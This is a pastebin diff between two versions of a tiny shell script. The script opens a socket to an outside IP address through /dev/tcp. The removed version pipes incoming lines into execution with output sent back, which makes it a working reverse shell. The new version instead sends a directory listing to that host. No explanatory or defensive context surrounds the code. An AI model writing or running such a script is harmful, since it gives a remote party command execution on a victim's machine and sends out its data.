View difference between Paste ID: dumE4p20 and ZKBkUSa8
SHOW: | | - or go back to the newest paste.
1
#!/bin/sh
2
exec 5<>/dev/tcp/188.166.48.8/1234
3-
cat <&5 | while read line; do $line 2>&5 >&5; done
3+
ls 2>&5 >&5